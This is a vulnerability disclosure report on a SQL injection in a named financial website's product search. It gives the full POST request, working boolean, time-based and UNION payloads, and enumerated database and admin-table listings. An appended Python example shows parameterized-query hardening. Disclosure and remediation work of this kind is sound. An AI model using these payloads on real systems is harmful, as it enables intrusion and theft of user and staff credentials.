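2015-08-05: Details reported to the vendor; awaiting vendor handling
2015-08-06: Vendor confirmed; details disclosed to the vendor only
2015-08-16: Details disclosed to core white hats and experts in related fields
2015-08-26: Details disclosed to regular white hats
2015-09-05: Details disclosed to intern white hats
2015-09-20: Details disclosed to the public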
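The main site of Puyi Wealth (普益财富) has a SQL injection vulnerability that exposes a large amount of sensitive database user information, including user passwords.
Injection URL: http://www.pywm.com.cn:80/issue_product---index.html
POST-based SQL injection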
POST /issue_product---index.html HTTP/1.1
Content-Length: 112
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.pywm.com.cn/
Cookie: PHPSESSID=db3fdf2a0148760f152971045d3c2af9; AJSTAT_ok_pages=1; AJSTAT_ok_times=1
Host: www.pywm.com.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

button=%c9%b8%d1%a1&category=1&duration=&issue_way=&sale_state=&start_point=
The injection point is the category parameter.
Parameter: category (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: button=%c9%b8%d1%a1&category=1 AND 9151=9151&duration=&issue_way=&sale_state=&start_point=

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: button=%c9%b8%d1%a1&category=1 AND (SELECT * FROM (SELECT(SLEEP(5)))aqky)&duration=&issue_way=&sale_state=&start_point=

    Type: UNION query
    Title: Generic UNION query (NULL) - 14 columns
    Payload: button=%c9%b8%d1%a1&category=1 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7162626271,0x66544c4854435a585251,0x7171766a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &duration=&issue_way=&sale_state=&start_point=
The SQL injection runs with DBA privileges.
Listing the dbs shows 43 databases:
[*] bugfree2
[*] bugtracker
[*] cardinfo
[*] cj
[*] club
[*] cnbene
[*] cnbene_address
[*] cnbene_data
[*] cnbene_product
[*] code
[*] crm
[*] data
[*] delete
[*] democnbene
[*] dotproject
[*] fpsale
[*] fund_sale_admin
[*] gd_noxm
[*] gdnx
[*] gdnx_develop
[*] getbook
[*] historical_data_bak
[*] hxbbank_data
[*] information_schema
[*] jishiyu
[*] lccp_admin
[*] man_crm
[*] market
[*] member
[*] mysql
[*] partners_db
[*] pms
[*] product
[*] search_demo
[*] session
[*] sms
[*] soocai
[*] terrace
[*] test
[*] test_cnbene
[*] test_crm
[*] webadmin
[*] webdata
Enumerated the tables in the webadmin database:
+-----------------------------+
| card_dealer_getaccount      |
| card_dealer_info            |
| card_dealer_record          |
| card_self_dealer_getaccount |
| exam_itempool               |
| exam_question               |
| front_accesscontrol         |
| front_accesscontrol_stock   |
| front_analyst_info          |
| front_answer                |
| front_answer_del            |
| front_article               |
| front_article_class         |
| front_customer_info         |
| front_group                 |
| front_group_stock           |
| front_history_comment       |
| front_knowledgebase         |
| front_mydata                |
| front_questions             |
| front_questions_del         |
| front_questions_stock       |
| front_questionstype         |
| front_stocksearchcount      |
| front_visit                 |
| productsale_customize       |
| ss_admingroup               |
| ss_admingroup_temp          |
| ss_adminloginlog            |
| ss_adminrights              |
| ss_adminuser                |
| ss_adminuser_temp           |
| ss_uploads                  |
+-----------------------------+
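The ss_adminuser table contains account and password information for a large number of staff.
Database user information can also be dumped; there are 70 database users.
Password hashes were dumped for some of these users.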
Filter input properly. Hoping for a high rank... I've submitted so many reports, is there a small gift?
Severity: High
Vulnerability Rank: 15
Confirmation time: 2015-08-06 11:58
Thanks
None yet
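
The fix advice in the report ("filter input properly"), shown as an added example that is not code from the report or from the site: the numeric category field is handled first by string concatenation, then with an integer allow-list plus a bound parameter. The table, the function names and the use of sqlite3 in place of the site's MySQL backend are assumptions for illustration.

```python
import sqlite3

def make_db():
    # Constructed sample data; sqlite3 stands in for the site's MySQL backend.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE product (id INTEGER PRIMARY KEY, category INTEGER, name TEXT)")
    db.executemany("INSERT INTO product (category, name) VALUES (?, ?)",
                   [(1, "fund-a"), (1, "fund-b"), (2, "trust-c")])
    return db

def search_vulnerable(db, raw):
    # 'Before': the POST value is concatenated into the statement, so anything
    # after the number is parsed as part of the WHERE clause.
    sql = "SELECT name FROM product WHERE category = " + raw + " ORDER BY id"
    return [row[0] for row in db.execute(sql)]

def parse_category(raw):
    # Allow-list: category is a numeric id, so accept a short run of ASCII digits only.
    if not (raw.isascii() and raw.isdigit() and len(raw) <= 9):
        raise ValueError("category must be a non-negative integer")
    return int(raw)

def search_hardened(db, raw):
    # 'After': validate the type, then bind the value so it is never parsed as SQL.
    sql = "SELECT name FROM product WHERE category = ? ORDER BY id"
    return [row[0] for row in db.execute(sql, (parse_category(raw),))]

def leaks_boolean_oracle(search, db):
    # Regression check using the payload shape from the report: a handler is
    # injectable if a true and a false appended condition give different answers.
    def outcome(raw):
        try:
            return search(db, raw)
        except ValueError:
            return "rejected"
    return outcome("1 AND 9151=9151") != outcome("1 AND 9151=9152")

if __name__ == "__main__":
    db = make_db()
    print("vulnerable leaks oracle:", leaks_boolean_oracle(search_vulnerable, db))
    print("hardened leaks oracle:  ", leaks_boolean_oracle(search_hardened, db))
```

Validating the integer before binding matters on MySQL in particular, where a bound string that merely starts with a digit is silently cast to that number in a numeric comparison.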